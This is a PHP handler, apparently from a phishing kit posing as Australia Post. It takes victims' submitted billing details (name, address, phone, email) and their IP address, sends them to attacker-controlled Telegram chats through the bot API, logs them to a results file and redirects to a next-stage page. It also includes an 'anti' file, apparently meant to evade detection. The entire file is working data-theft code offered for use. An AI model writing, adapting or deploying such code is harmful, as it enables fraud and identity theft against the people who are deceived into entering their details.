<?php
include "anti/index.php";
include "id.php";

if(isset($_POST['login'])){
$ip = getenv("REMOTE_ADDR");
$message = "=|=[ BILLING INFORMATION ]=|
|Full Name : ".$_POST['fullname']."
|Address 1 : ".$_POST['add1']."
|Address 2 : ".$_POST['add2']."
|City      : ".$_POST['city']."
|state  : ".$_POST['sstate']."
|zip Code  : ".$_POST['zipp']."
|Phone num  : ".$_POST['phonee']."
|Email: ".$_POST['emaile']."
|IP      : ".$ip."
|==[ AUSPOST XTN ]==|";
foreach($user_ids as $user_id) {
$url='https://api.telegram.org/bot' . $bot . '/sendMessage';
$data=array('chat_id'=>$user_id,'text'=>$message);
$options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
$context=stream_context_create($options);
$result=file_get_contents($url,false,$context);
}
$myfile = fopen("rzlt.txt", "a+");
$txt = $message;
fwrite($myfile, $txt);
fclose($myfile);
HEADER("Location: index2.php");
}
?>